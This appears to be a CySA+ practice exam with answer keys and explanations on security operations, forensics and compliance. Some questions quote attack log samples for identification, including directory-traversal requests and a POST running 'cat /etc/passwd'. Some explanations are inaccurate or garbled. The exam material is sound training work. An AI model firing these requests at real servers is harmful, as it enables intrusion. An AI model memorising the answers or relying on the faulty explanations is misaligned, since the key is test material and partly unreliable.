CySA Practice Exam #2
B. Microsoft's Group Policy Object (GPO) is a collection of Group Policy settings that defines what a system will look like and how it will behave for a defined group of users. It allows an administrator to create a policy and deploy it across many devices in the domain or network.
Which of the following security controls provides Windows system administrators with an efficient way to deploy system configuration settings across many devices? A. Patch management B. GPO C. HIPS D. Anti-malware
D. DNS blackholing is a process that uses a list of known domains/IP addresses belonging to malicious hosts and uses an internal DNS server to create a fake reply.
Joseph would like to prevent hosts from connecting to known malware distribution domains. What type of solution should be used without deploying endpoint protection software or an IPS system? A. Route poisoning B. Anti-malware router filters C. Subdomain whitelisting D. DNS blackholing
D. Simple Network Management Protocol (SNMP) is commonly used to gather information from routers, switches, and other network devices. It provides information about a device's status, including CPU and memory utilization, and many other useful details about the device.
Which of the following protocols is commonly used to collect information about CPU utilization and memory usage from network devices? A. NetFlow B. SMTP C. MIB D. SNMP
B. Banner grabbing requires a connection to the host to grab the banner successfully. This is an active reconnaissance activity.
Which of the following techniques listed below are not appropriate to use during a passive reconnaissance exercise against a specific target company? A. WHOIS lookups B. Banner grabbing C. BGP looking glass usage D. Registrar checks
A. A DNS zone transfer provides a full listing of DNS information. If your organization's internal DNS server is improperly secured, an attacker can gather this information by performing a zone transfer.
Which of the following techniques would allow an attacker to get a full listing of your internal DNS information if your DNS server is not properly secured? A. Zone transfers B. Split horizon C. FQDN resolution D. DNS poisoning
C. Advanced Persistent Threat (APT) attackers are sophisticated and have access to financial and technical resources typically provided by a government. An APT is an attacker with the ability to obtain, maintain, and diversify access to network systems using exploits and malware.
Which of the following types of attackers are sophisticated and highly organized people or teams typically sponsored by a nation-state? A. Script kiddies B. Hacktivists C. Advanced Persistent Threat D. Ethical hacker
D. This is an example of behavior-based detection. Behavior-based detection (or statistical- or profile-based detection) means that the engine is trained to recognize baseline traffic or expected events associated with a user account or network device. Anything that deviates from this baseline (outside a defined level of tolerance) generates an alert.
Alexa is an analyst for a large bank that has offices in multiple states. She wants to create an alert to detect if an employee from one bank office logs into a workstation located at an office in another state. What type of detection and analysis is Alexa configuring? A. Trend B. Anomaly C. Heuristic D. Behavior
A. Shodan (shodan.io) is a search engine that identifies Internet-connected devices of all types. The engine uses banner grabbing to identify the type of device, firmware/OS/app type, and version, plus vendor and ID information. This involves no direct interaction with the company's public-facing internet assets since this might give rise to detection.
As a newly hired cybersecurity analyst, you are attempting to determine your organization's current public-facing attack surface. Which of the following methodologies or tools generates a current and historical view of the company's public-facing IP space? A. shodan.io B. nmap C. Google hacking D. Review network diagrams
B.
DeepScan supports data-flow analysis and understands the execution flow of a program. It allows you to see possible security flaws without executing the code. Which of the following types of tools would DeepScan be classified as? A. Fuzzer B. Static code analyzer C. Decompiler D. Fault injector
D. The Health Insurance Portability and Accountability Act (HIPPA) was created primarily to modernize the flow of healthcare information, stipulate how Personally Identifiable Information maintained by the healthcare and healthcare insurance industries should be protected from fraud and theft, and address limitations on healthcare insurance coverage. This is a federal law that must be following in the United States.
Dion Consulting Group has recently been awarded a contract to provide cybersecurity services for a major hospital chain in 48 cities across the United States. Previously, the consultants have won numerous contracts with financial services and publicly traded companies, but they are new to the healthcare industry. Which of the following laws must the consultants review to ensure the hospital and its customers are fully protected? A. SOX B. GLBA C. COSO D. HIPAA
C. Since the analyst cannot remediate the vulnerabilities by installing a patch, the next best action would be to implement some compensating controls. If a vulnerability exists that cannot be patched, compensating controls can mitigate the risk.
During an assessment of the POS terminals that accept credit cards, a cybersecurity analyst notices a recent Windows operating system vulnerability exists on every terminal. Since these systems are all embedded and require a manufacturer update, the analyst cannot install Microsoft's regular patch. Which of the following options would be best to ensure the system remains protected and are compliant with the rules outlined by the PCI DSS? A. Replace the Windows POS terminals with standard Windows systems B. Build a custom OS image that includes the patch C. Identify, implement, and document compensating controls D. Remove the POS terminals from the network until the vendor releases a patch
B. The -O flag indicates to nmap that it should attempt to identify the target's operating system during the scanning process. It does this by evaluating the responses it received during the scan against its signature database for each operating system.
If you want to conduct an operating system identification during a nmap scan, which syntax should you utilize? A. nmap -os B. nmap -O C. nmap -id D. nmap -osscan
C. The dissemination phase refers to publishing information produced by analysis to consumers who need to develop the insights.
In which phase of the security intelligence cycle is published information relevant to security issues provided to those who need to act on that information? A. Feedback B. Analysis C. Dissemination D. Collection
D. The management interface should only be exposed to an isolated or dedicated network used for the management and configuration of the network device and platforms only. This would also help reduce the likelihood of an attack against the virtualization platform or the hypervisor itself. The external zone (internet), internal zone (LAN), or DMZ should not have the management interface exposed to them.
Judith is conducting a vulnerability scan of her data center. She notices that a management interface for a virtualization platform is exposed to her vulnerability scanner. Which of the following networks should the hypervisor's management interface be exposed to ensure the best security of the virtualization platform? A. External zone B. Internal zone C. DMZ D. Management network
B. The US Department of Defense (DoD) has set up a Trusted Foundry Program, operated by the Defense Microelectronics Activity (DMEA). Accredited suppliers have proved themselves capable of operating a secure supply chain, from design to manufacture and testing. The Trusted Foundry program to help assure the integrity and confidentiality of circuits and manufacturing. The purpose is to help verify that foreign governments' agents are not able to insert malicious code or chips into the hardware being used by the military systems. This is part of ensuring hardware source authenticity and ensure purchasing is made from reputable suppliers to prevent the use of counterfeited or compromised devices.
Mark works as a Department of Defense contracting officer and needs to ensure that any network devices he purchases for his organization's network are secure. He utilizes a process to verify the chain of custody for every chip and component used in the device's manufacturer. What program should Mark utilize? A. Gray market procurement B. Trusted Foundry C. White market procurement D. Chain of procurement
C. A password expiration control in the policy would force users to change their password at specific time intervals. This will then locks out a user who types in the incorrect password or create an alter that the user's account has been potentially compromised.
Marta's organization is concerned with the vulnerability of a user's account being vulnerable for an extended period of time if their password was compromised. Which of the following controls should be configured as part of their password policy to minimize this vulnerability? A. Minimum password length B. Password history C. Password expiration D. Password complexity
A. A managed security service provider (MSSP) provides security as a service (SECaaS). IaaS, PaaS, and SaaS (infrastructure, platform, and software as a service) do not include security monitoring as part of their core service offerings. Security as a service or a managed service provider (MSP) would be better suited for this role.
Nicole's organization does not have the budget or staff to conduct 24/7 security monitoring of their network. To supplement her team, she contracts with a managed SOC service. Which of the following services or providers would be best suited for this role? A. MSSP B. IaaS C. PaaS D. SaaS
C. DNS poisoning (also known as DNS cache poisoning or DNS spoofing) is a type of attack which uses security gaps in the Domain Name System (DNS) protocol to redirect internet traffic to malicious websites.
Richard attempted to visit a website and received a DNS response from the DNS cache server pointing to the wrong IP address. Which of the following attacks has occurred? A. DNS brute forcing B. ARP spoofing C. DNS poisoning D. MAC spoofing
C. While patching a system is necessary to remediate a vulnerability, you should always test the patch before implementation. It is considered a best practice to create a staging or sandbox environment to test the patches' installation before installing them into the production environment. This reduces the risks of the patch breaking something in the production system.
Sagar is planning to patch a production system to correct a detected vulnerability during his most recent vulnerability scan of the network. What process should he follow to minimize the risk of a system failure while patching this vulnerability? A. Deploy the patch immediately on the production system to remediate the vulnerability B. Wait 60 days to deploy the patch to ensure there are no associated bugs reported with it C. Deploy the patch in a sandbox environment to test it prior to patching the production system D. Contact the vendor to determine a safe time frame for deploying the patch into the production environment
B. When booting in Safe Mode, Run and RunOnce are ignored by the Windows system. The Registry's autorun entries are often targeted because they're not always visible to the average user. In modern Windows systems, there are two types of autorun keys: Run, which initializes its values asynchronously, and RunOnce, which initializes its values in order. By default, these keys are ignored when the computer is started in Safe Mode.
Shawn needs to boot a system to remediate it. The system was compromised by an attack and had a malicious program installed by creating a RunOnce key in the registry. What can Shawn do to boot the computer and prevent the RunOnce from executing the malicious program listed in the registry key? A. Disable the registry at boot B. Boot with Safe Mode C. Boot with the -RunOnce flag D. RunOnce cannot be disabled therefore she will need to boot from external media to disable it first
A. XCCDF (extensible configuration checklist description format) is a language that is used in creating checklists for reporting results.
What SCAP component could be to create a checklist to be used by different security teams within an organization and then report results in a standardized fashion? A. XCCDF B. CCE C. CPE D. CVE
D. Input validation prevents the attacker from sending invalid data to an application and is a strong control against both SQL injection and cross-site scripting attacks.
What control provides the best protection against both SQL injection and cross-site scripting attacks? A. Hypervisors B. Network layer firewalls C. CSRF D. Input validation
D. TOGAF is a prescriptive framework that divides the enterprise architecture into four domains. Technical architecture describes the infrastructure needed to support the other architectural domains. Business architecture defines governance and organization and explains the interaction between enterprise architecture and business strategy. Applications architecture includes the applications and systems an organization deploys, the interactions between those systems, and their relation to the business processes. Data architecture provides the organization's approach to storing and managing information assets.
What describes the infrastructure needed to support the other architectural domains in the TOGAF framework? A. Business architecture B. Applications architecture C. Data architecture D. Technical architecture
C. Chain of custody forms list every person who has worked with or who has touched the evidence that is a part of an investigation. These forms record every action taken by each individual in possession of the evidence.
What information should be recorded on a chain of custody form during a forensic investigation? A. The list of individuals who made contact with files leading to the investigation B. The list of former owners/operators of the workstation involved in the investigation C. Any individual who worked with evidence during the investigation D. The law enforcement agent who was first on the scene
C. The organization should enable sampling of the data collected. Sampling can help them capture network flows that could be useful without collecting everything passing through the sensor. This reduces the bottleneck of 2 Gbps and still provide useful information.
A company's NetFlow collection system can handle up to 2 Gbps. Due to excessive load, this has begun to approach full utilization at various times of the day. If the security team does not have additional money in their budget to purchase a more capable collector, which of the following options could they use to collect useful data? A. Enable QoS B. Enable NetFlow compression C. Enable sampling of the data D. Enable full packet capture
B. This results from the vulnerability scan conducted shows an enumeration of open Windows shares on an Apache server. The enumeration results show three share names (print$, files, Temp) were found using a null session connection. There is no associated CVE with this vulnerability, but it is not a false positive. Not all vulnerabilities have a CVE associated with them.
A vulnerability scan has returned the following results: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Detailed Results10.56.17.21 (APACHE-2.4) Windows SharesCategory: WindowsCVE ID: -Vendor Ref: -Bugtraq ID: -Service Modified - 8.30.2017 Enumeration Results:print$ c:\windows\system32\spool\driversfiles c:\FileShare\AccountingTemp c:\temp -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- What best describes the meaning of this output? A. There is an unknown bug in an Apache server with no Bugtraq ID B. Connecting to the host using a null session allows enumeration of the share names on the host C. Windows Defender has a known exploit that must be resolved or patched D. There is no CVE present, so this is a false positive caused by Apache running on a Windows server
A. Pair programming is a real-time process that would meet this requirement. It utilizes two developers working on one workstation, where one developer reviews the code being written in real-time by the other developer.
James is working with the software development team to integrate real-time security reviews into some of their SDLC processes. Which of the following would best meet this requirement? A. Pair Programming B. Pass-around code review C. Tool-assisted review D. Formal code review
D.
Which of the following classifications would apply to patents, copyrights, and trademarks? A. PII B. PHI C. Trade secrets D. Intellectual property
B. A directory traversal attack aims to access files and directories stored outside the webroot folder. By manipulating variables or URLs that reference files with "dot-dot-slash (../)" sequences and its variations or using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. The example output provided comes from a remote code execution vulnerability being exploited in which a directory traversal is used to access the files.
A cybersecurity analyst is reviewing the logs of a Citrix NetScaler Gateway running on a FreeBSD 8.4 server and saw the following output: -=-=-=-=--=-=-=-=--=-=-=-=--=-=-=-=--=-=-=-=--=-=-=-=--=-=-=-=- 10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143 "https://10.1.1.2/" "USERAGENT " 10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] "GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1" 200 941 "-" "USERAGENT" 10.1.1.1 - - [10/Jan/2020:16:12:31 +0000] "POST /vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143 "https://10.1.1.2/" "USERAGENT" -=-=-=-=--=-=-=-=--=-=-=-=--=-=-=-=--=-=-=-=--=-=-=-=--=-=-=-=- What type of attack was most likely being attempted by the attacker? A. SQL injection B. Directory traversal C. XML injection D. Password spraying
A. FileVault 2 is a full-disk encryption system used on macOS devices. A drive can be decrypted if you have the encryption key. This key can be recovered from memory while the volume is mounted. The Recovery key can also be obtained either from the user's notes or from their storage area of iCloud. You cannot unlock the volume by conducting a brute force attack against the drive. It uses the AES 256-bit encryption system, which is currently unbreakable without access to a supercomputer.
A forensic analyst needs to access a macOS encrypted drive that uses FileVault 2. Which of the following methods is NOT a means of unlocking the volume? A. Conduct a brute-force attack against the FileVault 2 encryption B. Retrieve the key from memory while the volume is mounted C. Acquire the recovery key D. Extract the keys from iCloud
A. During the first phase of a forensic investigation, an analyst should ensure the scene is safe before beginning evidence collection. Then, they should secure the scene to prevent any contamination of evidence. An analyst will then begin to collect evidence during the collection phase while documenting their efforts and maintaining the integrity of the data collected. Once the analyst moves into the analysis phase, they will copy the evidence and perform their analysis on the copy. Finally, a report is generated during the reporting phase.
A forensics team follows documented procedures while investigating a data breach. The team is currently in the first phase of its investigation. Which of the following processes would they perform during this phase? A. Secure the scene to prevent contamination of evidence B. Create a report of the methods and tools used C. Document and prove the integrity of evidence D. Make a copy of the evidence
B. Based on the scenario provided, it appears that the laptop has become the victim of a zero-day attack. A zero-day attack is an attack that exploits a potentially serious software security weakness that the vendor or developer may be unaware of. This means that there will not be a signature available in the IDS or anti-virus definition file. Therefore, it cannot be combatted with traditional signature-based detection methods.
A salesperson's laptop has become unresponsive after attempting to open a PDF in their email. A cybersecurity analyst reviews the IDS and anti-virus software for any alerts or unusual behavior but finds nothing suspicious. Which of the following threats would BEST classify this scenario? A. Ping of death B. Zero-day malware C. PII exfiltration D. RAT
C. When a cookie has the Secure attribute, the user agent includes the cookie in an HTTP request only if transmitted over a secure channel (typically HTTPS). Although seemingly useful for protecting cookies from active network attackers, the Secure attribute protects only the cookie's confidentiality.
A web developer wants to protect their new web application from a man-in-the-middle attack. Which of the following controls would best prevent an attacker from stealing tokens stored in cookies? A. Forcing the use of TLS for the web application B. Forcing the use of SSL for the web application C. Setting the secure attribute on the cookie D. Hashing the cookie value
B. Formal verification methods use a mathematical model of the inputs and outputs of a system to prove that the system works as specified in all cases. Given the level of certainty achieved through formal verification methods, this approach provides the single greatest mitigation against this threat. Formal methods are designed for use in critical software in which corner cases must be eliminated.
Dion Consulting Group has recently received a contract to develop a networked control system for a self-driving car. The company's CIO is concerned about the liability of a security vulnerability being exploited that may result in the death of a passenger or an innocent bystander. Which of the following methodologies would provide the single greatest mitigation if successfully implemented? A. Rigorous user acceptance testing B. Formal methods of verification C. DevSecOps D. Peer review of source code
B. During the attack phase, the attacker seeks to gain access to a system, escalate that access to obtain complete control, and then conduct browsing to identify mechanisms to gain access to additional systems.
During which phase of an attack would a penetration tester seek to gain complete control of a system? A. Planning B. Attack C. Reporting D. Discovery
C. This is a post request to run the "cat /etc/passwd" command from an outside source. It is not known from the evidence provided if this command were successful or not, but it should be analyzed further as this is not what would be expected, normal traffic.
Fail to Pass Systems recently installed a break and inspect appliance that allows their cybersecurity analysts to observe HTTPS traffic entering and leaving their network. Consider the following output from a recorded session captured by the appliance:-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-POST /www/default.php HTTP/1.1HOST: <external IP address>.123Content-Length: 147Cache-Control: no-cacheOrigin: chrome-extension://ghwjhwrequsdsUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaym16ehT29q60rUxAccept:*/*Accept-Language: zh, en-us; q=0.8, en; q=0.6Cookie: security=low; PHPSESSID=jk3j2kdso8x73kdjhehakske ------WebKitFormBoundaryaym16ehT29q60rUxContent-Disposition: form-data; name="q" cat /etc/passwd------WebKitFormBoundaryaym16ehT29q60rUx-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Which of the following statements is true? A. The /etc/passwd file was just downloaded through a webshell by an attacker B. This is a normal request from a host to your web server in the DMZ C. A request to issue the command "cat /etc/passwd" occurred but additional analysis is required to verify if the file was downloaded D. The web browser used in the attack was Microsoft Edge
C. A reverse proxy is positioned at the cloud network edge and directs traffic to cloud services if the contents of that traffic comply with the policy. This does not require the configuration of the users' devices. This approach is only possible if the cloud application has proxy support. You can deploy a reverse proxy and configure it to listen for client requests from a public network, like the internet. The proxy then creates the appropriate request to the internal server on the corporate network and passes the server's response back to the external client.
What is a reverse proxy commonly used for? A. Allowing access to a virtual private cloud B. To prevent the unauthorized use of cloud services from the local network C. Directing traffic to internal services if the contents of the traffic comply with policy D. To obfuscate the origin of a user within a network
A. An organization's willingness to tolerate risk is known as its risk appetite. If you determine that you have a greater risk appetite for a certain system or function of the business, you may choose to scan less it frequently, for example. If you have a low-risk appetite, you will place a higher amount of resources towards defending and mitigating your systems.
What is the term for the amount of risk that an organization is willing to accept or tolerate? A. Risk appetite B. Risk avoidance C. Risk deterrence D. Risk transference
A. Zone transfers provide an easy way to send all the DNS information from one DNS server to another, but an attacker could also use it for reconnaissance against your organization. For this reason, most administrators disable zone transfers from untrusted servers.
What method might a system administrator use to replicate the DNS information from one DNS server to another, but could also be used maliciously by an attacker? A. Zone transfers B. DNS registration C. CNAME D. DNSSEC
A. Cisco log levels range from 0 for emergencies to 7 for debugging. Level 0 is for emergencies, such as when the system is unusable (for example, a device shutting down due to failure).
Which level of logging should you configure on a Cisco device to be notified whenever they shut down due to a failure? A. 0 B. 2 C. 5 D. 7
C. The first thing that must be done after acquiring a forensic disk image is to create a hash digest of the source drive and destination image file to ensure they match. A critical step in the presentation of evidence will be to prove that analysis has been performed on an identical image to the data present on the physical media and that neither data set has been tampered with. The standard means of proving this is to create a cryptographic hash or fingerprint of the disk contents and any derivative images made from it. When comparing hash values, you need to use the same algorithm used to create the reference value.
Which of the following actions should be done FIRST after forensically imaging a hard drive for evidence in an investigation? A. Digitally sign the image file to provide non-repudiation of the collection B. Encrypt the source drive to ensure an attacker cannot modify its contents C. Create a hash digest of the source drive and the image file to ensure they match D. Encrypt the image file to ensure it maintains data integrity
C. Encrypting data in transit leads to more integrity and confidentiality of the data, and therefore trust. Hashing files using MD5 to check against known valid checksums would provide integrity, and therefore validation and trust. Implementing a file integrity monitoring program, such as Tripwire, would also improve data validation and trust. Decrypting data at rest does not improve data validation, or trust since the data at rest could be modified when decrypted.
Which of the following is NOT a means of improving data validation and trust? A. Encrypting data in transit B. Using MD5 checksums for files C. Decrypting data at rest D. Implementing Tripwire
B. Cyber, human, and physical are all recognized adversarial attack vectors in the framework. While the information may be exchanged in all of these factors, the term is too generic to uniquely describe any given attack vector under the MITRE ATT&CK framework. Cyber is the use of hardware or software IT systems. Human is the use of social engineering, coercion, impersonation, or force. Physical relies on gaining local access.
Which of the following is not a recognized adversarial attack vector according to the MITRE ATT&CK framework? A. Cyber B. Informational C. Physical D. Human
C.
Which of the following is the default nmap scan type when you do not provide a flag when issuing the command? A. A TCP FIN scan B. A TCP connect scan C. A TCP SYN scan D. A UDP scan
C. Vulnerability scanners typically cannot confirm that a blind SQL injection with the execution of code has previously occurred.
Which of the following is the most difficult to confirm with an external vulnerability scan? A. Cross-site scripting (XSS) B. Cross-site request forgery (XSRF/CSRF) C. Blind SQL injection D. Unpatched web server
B. A system on a chip is an integrated circuit that integrates all or most components of a computer or other electronic system. These components almost always include a central processing unit, memory, input/output ports, and secondary storage - all on a single substrate or microchip, the size of a coin. This makes the savings of space and power the most important feature to consider when designing a system on a chip.
Which of the following is the most important feature to consider when designing a system on a chip? A. Type of real-time operating system in use B. Space and power savings C. Ability to interface with industrial control systems D. Ability to be reconfigured after manufacture
A.
Which of the following lists represents the NIST cybersecurity framework's four tiers, when ordered from least mature to most mature? A. Partial, Risk Informed, Repeatable, Adaptive B. Partial, Repeatable, Risk Informed, Adaptive C. Partial, Risk Informed, Managed, Adaptive D. Partial, Managed, Risk Informed, Adaptive
C. BitLocker information is not stored in the Master Boot Record (MBR). Therefore, you cannot retrieve the key from the MBR.
Which of the following methods could not be used to retrieve the key from a forensic copy of a BitLocker encrypted drive? A. Analyzing the hibernation file B. Analyzing the memory dump file C. Retrieving the key from the MBR D. Performing a FireWire attack on mounted drives
A.
Which of the following protocols could be used inside a virtual system to manage and monitor the network? A. SNMP B. SMTP C. BGP D. EIGRP
A. The incident response policy contains procedures and guidelines covering appropriate priorities, actions, and responsibilities in the event of security incidents, divided into preparation, detection/analysis, containment, eradication/recovery, and post-incident stages. Procedures provide detailed, tactical information to the CSIRT and represent the team members' collective wisdom and subject-matter experts.
Which of the following provides the detailed, tactical information that CSIRT members need when responding to an incident? A. Procedures B. Guidelines C. Policies D. Framework
D. Input validation is performed to ensure only properly formed data is entering the workflow in an information system, preventing malformed data from persisting in the database and triggering a malfunction of various downstream components. Input validation should happen as early as possible in the data flow, preferably as soon as the data is received from the user.
Which of the following secure coding best practices ensures special characters like <, >, /, and ' are not accepted from the user via a web form? A. Session management B. Output encoding C. Error handling D. Input validation
B. Protected health information (PHI) is defined as any information that identifies someone as the subject of medical and insurance records, plus their associated hospital and laboratory test results. This type of data is protected by the Health Insurance Portability and Accountability Act (HIPPA). It requires notification of the individual, the Secretary of the US Department of Health and Human Services (HHS), and the media (if more than 500 individuals are affected) in the case of a data breach.
Which of the following types of data breaches would require that the US Department of Health and Human Services and the media be notified if more than 500 individuals are affected by a data breach? A. Credit card information B. Protected health information C. Personally identifiable information D. Trade secret information
A, B, C, D. Proper input validation can prevent cross-site scripting, SQL injection, directory traversal, and XML injections from occurring. When an application accepts string input, the input should be subjected to normalization or sanitization procedures before being accepted. Normalization means that a string is stripped of illegal characters or substrings and converted to the accepted character set. This can prevent SQL and XML injections from occurring. Input validation is also good at preventing cross-site scripting (XSS) in forms that accept user input. Directory traversals can be prevented by conducting input validation in file paths or URL that is accepted from a user. This prevents a canonicalization attack from disguising the nature of the malicious input that could cause a directory traversal.
Which of the following vulnerabilities can be prevented by using proper input validation? (SELECT ANY THAT APPLY) A. Cross-site scripting B. SQL injection C. Directory traversal D. XML injection
B. Credentialed scans log into a system and retrieve their configuration information. Therefore, it should provide you with the best results.
Which of the following vulnerability scans would provide the best results if you want to determine if the target's configuration settings are correct? A. Non-credentialed scan B. Credentialed scan C. External scan D. Internal scan
B. eFUSE is an Intel-designed mechanism to allow software instructions to blow a transistor in the hardware chip. One use of this is to prevent firmware downgrades, implemented on some game consoles and smartphones. Each time the firmware is upgraded, the updater blows an eFUSE. When there is a firmware update, the updater checks that the number of blown eFUSEs is not less than the firmware version number.
Which of the following would be used to prevent a firmware downgrade? A. SED B. eFUSE C. TPM D. HSM
A.
Which term defines the collection of all points from which an adversary could interact with a system and cause it to function in a way other than how it was designed? A. Attack surface B. Attack vector C. Threat model D. Adversary capability set
A. A trusted computing environment refers to every element's consistent and tamper-resistant operation within an enterprise.
Which term refers to the consistent and tamper-resistant operation of every element within an enterprise? A. Trusted computing environment B. Trusted foundry C. Trust certified enterprise D. Accredited network
A. The Syslog server is a centralized log management solution. By looking through the logs on the Syslog server, the technician could determine which service failed on which server since all the logs are retained on the Syslog server from all of the network devices and servers.
You are conducting an intensive vulnerability scan to detect which ports might be open to exploitation. During the scan, one of the network services becomes disabled and impacts the production server. Which of the following sources of information would provide you with the most relevant information for you to use in determining which network service was interrupted and why? A. Syslog B. Network mapping C. Firewall logs D. NIDS
A. As shown in the nmap scans' output, only two standard ports being utilized: 22 (SSH) and 80 (HTTP). But, when netcat is run against port 80, the banner provided shows the SMTP server is running on port 80. SMTP is normally run on port 25 by default, so running it on port 80 means your email server (SMTP) runs on a non-standard port.
You are a cybersecurity analyst who has been given the output from a system administrator's Linux terminal. Based on the output provided, which of the following statements is correct? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- BEGIN OUTPUT———————--------- # nmap win2k16.localNmap scan report for win2k16 (192.168.2.15)Host is up (0.132452s latency)Not shown: 997 closed ports PORT STATE SERVICE22/tcp open ssh80/tcp open http # nc win2k16.local 80220 win2k16.local DionTraining SMTP Server (Postfix/2.4.1) # nc win2k16.local 22SSH-2.0-OpenSSH_7.2 Debian-2 #———————---------END OUTPUT -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- A. Your email server is running on a non-standard port B. Your email server has been compromised C. Your organization has a vulnerable version of the SSH server software installed D. Your web server has been compromised
C. This is an example of an XML injection. XML injection manipulates or compromises the logic of an XML application or service. The injection of unintended XML content and/or structures into an XML message can alter an application's intended logic, and XML Injection can cause the insertion of malicious content into resulting messages/documents.
You are analyzing the SIEM for your company's e-commerce server when you notice the following URL in the logs of your SIEM:-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-https://www.diontraining.com/add_to_cart.php?itemId=5"+perItemPrice="0.00"+quantity="100"+/><item+id="5&quantity=0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Based on this line, what type of attack do you expect has been attempted? A. SQL injection B. Buffer overflow C. XML injection D. Session hijacking
C. This is an example of an XSS attack as recorded by a web server's log. In this example, the XSS attack was obfuscated by the attacker using HTML encoding. The encoding of %27%27 translates to two single quote marks (' '). While you don't need to be able to decode the exact string used in the logs, when you see HTML encoding on the exam, it is usually going to be an XSS attack unless you see SQL or XML statements in the string, which in this case there are neither of those.
You are analyzing the logs of a web server and see the following entry: -=-=-=-=-=--=-=-=-=-=--=-=-=-=-=- 192.168.1.25 - - [05/Aug/2020:15:16:42 -0400] "GET /%27%27;!-%22%3CDION%3E=&{()} HTTP/1.1″ 404 310 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.12)Gecko/2009070812 Ubuntu/19.04 (disco dingo) Firefox/3.0.12″ -=-=-=-=-=--=-=-=-=-=--=-=-=-=-=- Based on this entry, which of the following attacks was attempted? A. XML injection B. Buffer overflow C. XSS D. SQL injection
D. File carving is the process of extracting data from an image when that data has no associated file system metadata. A file-carving tool analyzes the disk at the sector/page level. It attempts to piece together data fragments from unallocated and slack space to reconstruct deleted files, or at least bits of information from deleted files. File carving depends heavily on file signatures or magic numbers—the sequence of bytes at the start of each file identifies its type.
You are conducting a forensic analysis of a hard disk and need to access a file that appears to have been deleted. Upon analysis, you have determined that the file's data fragments exist scattered across the unallocated and slack space of the drive. Which technique could you use to recover the data? A. Hashing B. Recovery C. Overwrite D. Carving
B. In the above REGEX, the \b parameter identifies that we are looking for whole words. The strategic use of the + operator indicates the three places where the word is broken into parts. The first part ([A-Za-z0-9_%+-]" is composed of upper or lower case alphanumeric symbols "_%+-." After the first part of the word and the at sign (@) is specified, follows by another word ([A-Za-z0-9.-]), a period (\.), and another purely alphabetic (non-numeric) string that is 2-6 characters in length. This finds a standard email format of [email protected] (but could be @something.co, @something.org, @something.money, or other options as long as the top-level domain is between 2 and 6 characters).
You are conducting a grep search on a log file using the following REGEX expression: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\b[A-Za-z0-9_%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Which of the following strings would be included in the output of the search? A. www.diontraining.com B. [email protected] C. [email protected] D. [email protected]
C. Following an incident, all types of permissions should be reviewed and reinforced. This especially affects file and firewall ACLs and system privileges assigned to administrative user or group accounts. This is performed during the recovery phase.
You are conducting an incident response and have already eradicated the malware from a victimized system. Which of the following actions should you perform as part of the recovery phase? A. Sanitization B. Reimaging C. Setting permissions D. Secure disposal
B. Based on your previous experience, you know that most workstations only store 40 GB of data. Since client workstations don't usually need to store data locally, and you noticed that a host's disk capacity has suddenly diminished, you believe it could indicate that it is used to stage data for exfiltration.
You are conducting threat hunting on your organization's network. Every workstation on the network uses the same configuration baseline and contains a 500 GB HDD, 4 GB of RAM, and the Windows 10 Enterprise operating system. You know from previous experience that most of the workstations only use 40 GB of space on the hard drives since most users save their files on the file server instead of the local workstation. You discovered one workstation that has over 250 GB of data stored on it. Which of the following is a likely hypothesis of what is happening, and how would you verify it? A. The host might be the victim of a remote access trojan -- you should reimage the machine immediately B. The host might use as a staging area for data exfiltration -- you should conduct volume-based trend analysis on the host's storage device C. The host might be offline and conducted backups locally -- you should contact a system administrator to have it analyzed D. The host might use as command and control node for a botnet -- you should immediately disconnect the host from the network
A. Isolation of Connor's computer by deactivating the port on the switch should be performed instead of just unplugging the computer. This would guarantee that Connor won't just plug the computer back into the network as soon as you leave his desk. While Connor won't be able to work without his workstation, it is essential to isolate the issue quickly to prevent future attempts at lateral movement from occurring and protect the company's data needed for continued business operations. While we are unsure of the issue's initial root cause, we know it is currently isolated to Connor's machine. He should receive remedial cybersecurity training, his workstation's hard drive forensically imaged for later analysis, and then his workstation should be remediated or reimaged.
You are notified by an external organization that an IP address associated with your company's email server has been sending spam emails requesting funds as part of a lottery collection scam. An investigation into the incident reveals the email account used was Connor from the sales department and that Connor's email account was only used from one workstation. You analyze Connor's workstation and discover several unknown processes running, but netflow analysis reveals no attempted lateral movement to other workstations on the network. Which containment strategy would be most effective to use in this scenario? A. Isolate the workstation computer by disabling the switch port and reset Connor's username/password B. Isolate the network segment Connor is on and conduct a forensic review of all workstations in the sales department C. Unplug the workstation's network cable and conduct a complete reimaging of the workstation D. Request disciplinary action for Connor for causing this incident
D. Point-of-sale malware (POS malware) is usually a type of malicious software (malware) that is used by cybercriminals to target point of sale (POS) and payment terminals with the intent to obtain credit card and debit card information, a card's track 1 or track 2 data and even the CVV code, by various man-in-the-middle attacks, that is the interception of the processing at the retail checkout point of sale system.
You are reverse engineering a piece of malware recovered from a retailer's network for analysis. They found that the malicious code was extracting track data from their customer's credit cards during processing. Which of the following types of threats would you classify this malware as? A. Rootkit B. Keylogger C. Ransomware D. POS malware
